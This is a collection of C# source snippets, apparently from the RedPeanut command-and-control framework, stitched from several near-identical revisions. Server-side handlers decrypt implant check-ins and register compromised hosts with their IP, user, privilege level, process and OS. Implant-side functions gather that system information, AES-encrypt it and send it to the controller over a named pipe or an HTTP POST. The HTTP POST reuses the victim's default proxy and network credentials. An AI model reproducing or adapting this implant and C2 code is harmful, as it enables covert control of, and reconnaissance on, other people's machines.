private ActionResult CheckIn(StreamReader reader, IAgentInstance agent) { CheckInMsg checkinmsg = null; try { Dictionary <string, string> args = GetParsedArgs(reader.ReadToEnd()); checkinmsg = GetCheckInMsg(args.GetValueOrDefault(Paramname), agent); try { agent.SysInfo = checkinmsg.systeminfo; Console.WriteLine("\n[*] Agent " + agent.AgentId + " checkedin"); Console.WriteLine("[*] IP: {0} | Integrity: {1} | User: {2} | Process: {3} | OS: {4}", agent.SysInfo.Ip, agent.SysInfo.Integrity, agent.SysInfo.User, agent.SysInfo.ProcessName, agent.SysInfo.Os); RedPeanutC2.server.RemoveAgentInbound(agent.AgentId); RedPeanutC2.server.RegisterAgent(agent.AgentId, agent); return(Ok(CreateOkMgs(agent))); } catch (Exception e) { Console.WriteLine("[x] Error during checkin agentid {0}", agent.AgentId); Console.WriteLine("[x] {0}", e.Message); httpContextAccessor.HttpContext.Response.Headers.Add("Connection", "Close"); return(NotFound()); } } catch (Exception e) { // Something goes wrong decripting or deserializing message return not found Console.WriteLine("[x] Something goes wrong decripting or deserializing message return not found 2"); Console.WriteLine("[x] {0}", e.StackTrace); httpContextAccessor.HttpContext.Response.Headers.Add("Connection", "Close"); return(NotFound()); } }
public static void SendCheckinSMB(string agentid, byte[] aeskey, byte[] aesiv, NamedPipeClientStream pipe) { //Collect system info SystemInfo sinfo = GetSystemInfo(); CheckInMsg msg = new CheckInMsg(); msg.agentid = agentid; msg.systeminfo = sinfo; string checkinmsg = new JavaScriptSerializer().Serialize(msg); var response = Crypto.Aes.EncryptAesMessage(checkinmsg, aeskey, aesiv); pipe.Write(response, 0, response.Length); string respdecr = Crypto.Aes.DecryptAesMessage(ReadMessage(pipe), aeskey, aesiv); }
private ActionResult CheckIn(StreamReader reader, IAgentInstance agent) { CheckInMsg checkinmsg = null; try { Dictionary <string, string> args = GetParsedArgs(reader.ReadToEnd()); checkinmsg = GetCheckInMsg(args.GetValueOrDefault(Paramname), agent); try { agent.SysInfo = checkinmsg.systeminfo; Console.WriteLine("\n[*] Agent " + agent.AgentId + " checkedin"); Console.WriteLine("[*] {0}", new string('-', 144)); Console.WriteLine("[*] | {0,-10} | {1,-15} | {2,-10} | {3,-32} | {4,-20} | {5,-40} |", "Agent", "IP", "Integrity", "User", "Process", "System"); Console.WriteLine("[*] {0}", new string('-', 144)); Console.WriteLine("[*] | {0,-10} | {1,-15} | {2,-10} | {3,-32} | {4,-20} | {5,-40} |", agent.AgentId, agent.SysInfo.Ip, agent.SysInfo.Integrity, agent.SysInfo.User, agent.SysInfo.ProcessName, agent.SysInfo.Os); Console.WriteLine("[*] {0}", new string('-', 144)); Program.GetMenuStack().Peek().RePrintCLI(); try { RedPeanutC2.server.RemoveAgentInbound(agent.AgentId); } catch (Exception) { } RedPeanutC2.server.RegisterAgent(agent.AgentId, agent); return(Ok(CreateOkMgs(agent))); } catch (Exception e) { Console.WriteLine("[x] Error during checkin agentid {0}", agent.AgentId); Console.WriteLine("[x] {0}", e.Message); Program.GetMenuStack().Peek().RePrintCLI(); httpContextAccessor.HttpContext.Response.Headers.Add("Connection", "Close"); return(NotFound()); } } catch (Exception e) { // Something goes wrong decripting or deserializing message return not found Console.WriteLine("[x] Something goes wrong decripting or deserializing message return not found 2"); Console.WriteLine("[x] {0}", e.StackTrace); httpContextAccessor.HttpContext.Response.Headers.Add("Connection", "Close"); return(NotFound()); } }
private Models.CheckInMsg GetCheckInMsg(string input, IAgentInstance agent) { var result = Convert.FromBase64String(input); //Espect cehckin message string line = DecryptAesMessage(result, agent.AesManager); CheckInMsg msg = new CheckInMsg(); try { msg = JsonConvert.DeserializeObject <CheckInMsg>(line); } catch (Exception e) { Console.WriteLine("Error: " + e.Message); } return(msg); }
private ActionResult CheckIn(StreamReader reader, IAgentInstance agent) { CheckInMsg checkinmsg = null; try { Dictionary <string, string> args = GetParsedArgs(reader.ReadToEnd()); checkinmsg = GetCheckInMsg(args.GetValueOrDefault(Paramname), agent); try { agent.SysInfo = checkinmsg.systeminfo; try { RedPeanutC2.server.RemoveAgentInbound(agent.AgentId); } catch (Exception) { } RedPeanutC2.server.RegisterAgent(agent.AgentId, agent); RedPeanutC2.server.PrintAgentCheckedIn(agent); return(Ok(CreateOkMgs(agent))); } catch (Exception e) { Console.WriteLine("[x] Error during checkin agentid {0}", agent.AgentId); Console.WriteLine("[x] {0}", e.Message); Program.GetMenuStack().Peek().RePrintCLI(); httpContextAccessor.HttpContext.Response.Headers.Add("Connection", "Close"); return(NotFound()); } } catch (Exception e) { // Something goes wrong decripting or deserializing message return not found Console.WriteLine("[x] Something goes wrong decripting or deserializing message return not found 2"); Console.WriteLine("[x] {0}", e.StackTrace); httpContextAccessor.HttpContext.Response.Headers.Add("Connection", "Close"); return(NotFound()); } }
//AES public static void SendCheckinHttp(string agentid, byte[] aeskey, byte[] aesiv, string rpaddress, string param, CookiedWebClient wc) { //Collect system info SystemInfo sinfo = GetSystemInfo(); CheckInMsg msg = new CheckInMsg(); msg.agentid = agentid; msg.systeminfo = sinfo; string checkinmsg = new JavaScriptSerializer().Serialize(msg); //string checkinmsg = JsonConvert.SerializeObject(msg, Formatting.Indented); var checkinmsgenc = Crypto.Aes.EncryptAesMessage(checkinmsg, aeskey, aesiv); string post = String.Format("{0}={1}", param, Convert.ToBase64String(checkinmsgenc)); wc.UseDefaultCredentials = true; wc.Proxy = WebRequest.DefaultWebProxy; wc.Proxy.Credentials = CredentialCache.DefaultNetworkCredentials; string resp = wc.UploadString(rpaddress, post); string respjson = Crypto.Aes.DecryptAesMessage(Convert.FromBase64String(resp), aeskey, aesiv); }